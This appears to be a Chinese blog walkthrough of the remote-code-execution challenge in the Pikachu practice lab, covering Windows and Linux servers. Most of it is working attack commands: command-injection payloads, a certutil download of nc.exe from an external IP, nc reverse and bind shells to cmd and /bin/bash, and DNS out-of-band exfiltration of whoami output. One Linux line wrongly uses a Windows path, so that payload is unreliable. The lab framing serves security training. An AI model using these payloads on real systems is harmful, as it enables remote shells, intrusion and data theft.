Pikachu之RCE全解:Windows与Linux系统网站的rce~payload~

Pikachu靶场是一个极具挑战性的网络安全练习平台,其中的远程代码执行(RCE)漏洞更是许多初学者学习和掌握的重要课题。本文将针对Pikachu靶场中的RCE漏洞,分别介绍在Windows和Linux服务器上的rce详细解决方案。


在Windows服务器上,通过ping命令执行命令时可能会出现乱码问题。针对这一问题,可以参考以下解决方案:pikachu中RCE出现乱码的解决的方案_pikachu rce乱码-CSDN博客


服务器为Windows系统的Pikachu网站

解法一:payload

127.0.0.1 && dir
127.0.0.1 & dir
127.0.0.1 | dir
127 || dir

在这里插入图片描述

解法二:通过上传nc来执行命令

127.0.0.1 & certutil.exe -urlcache -split -f http://43.139.186.80:80/nc.exe c://nc.exe

解法二.1:攻击者监听,网站主动连接给出shell

网站:
127.0.0.1 & c://nc.exe -e cmd 192.168.196.181 5566
攻击者:
nc -lvvp 5566

解法二.2:网站监听并给出shell,攻击者连接

网站:
127.0.0.1 & c://nc.exe -e cmd -lvvp 5566
攻击者:
nc 192.168.88.136 5566

在这里插入图片描述

解法三:利用dns外带平台解决无回显问题

powershell $x=whoami;$x=$x.replace('\','xxx');$y='.外连dns域名;$z=$x+$y;ping $z
去掉反斜杠的是因为结果带有“\”会导致ping命令无法执行

在这里插入图片描述


服务器为linux系统的pikachu网站

解法一:payload:

127.0.0.1 && dir
127.0.0.1 & dir
127.0.0.1 | dir
127 || dir
`whoami`
;whoami

在这里插入图片描述

解法二:利用dns外带平台解决无回显问题

`whoami`.域名

在这里插入图片描述

解法三:使用nc执行任意命令

解法三.1:攻击者监听,网站主动连接给出shell

网站:
127.0.0.1 & nc -e /bin/bash 192.168.196.181 5566
攻击者:
nc -lvvp 5566

解法三.2:网站监听并给出shell,攻击者连接

网站:
127.0.0.1 & c://nc.exe -e /bin/bash -lvvp 5566
攻击者:
nc 192.168.88.136 5566

总结

通过以上方法,可以有效地在Windows和Linux服务器上解决Pikachu靶场中的RCE漏洞问题。

对于初学者来说,掌握这些方法不仅能提高漏洞利用的技能,还能加深对系统命令执行原理的理解。

希望本文能对你在Pikachu靶场中的RCE漏洞挑战有所帮助。如果你有任何问题或需要进一步的帮助,请随时联系我。

相关推荐

  1. RHCE--Linux--网站需求

    2024-07-15 04:50:06       49 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-15 04:50:06       52 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-15 04:50:06       54 阅读
  3. 在Django里面运行非项目文件

    2024-07-15 04:50:06       45 阅读
  4. Python语言-面向对象

    2024-07-15 04:50:06       55 阅读

热门阅读

  1. LeetCode 算法:子集 c++

    2024-07-15 04:50:06       18 阅读
  2. 赫夫曼编码-C语言

    2024-07-15 04:50:06       18 阅读
  3. WEB安全-文件上传漏洞

    2024-07-15 04:50:06       13 阅读
  4. 线段树最大与最小值模板

    2024-07-15 04:50:06       16 阅读
  5. 使用Arthas定位开发常见问题

    2024-07-15 04:50:06       17 阅读
  6. UOS查看系统信息命令行

    2024-07-15 04:50:06       16 阅读
  7. 【学习笔记】Redis学习笔记——第11章 AOF持久化

    2024-07-15 04:50:06       21 阅读
  8. LeetCode 219. 存在重复元素 II

    2024-07-15 04:50:06       21 阅读
  9. 实验05 单元测试

    2024-07-15 04:50:06       21 阅读
  10. Hash表以及put方法源码的分析

    2024-07-15 04:50:06       20 阅读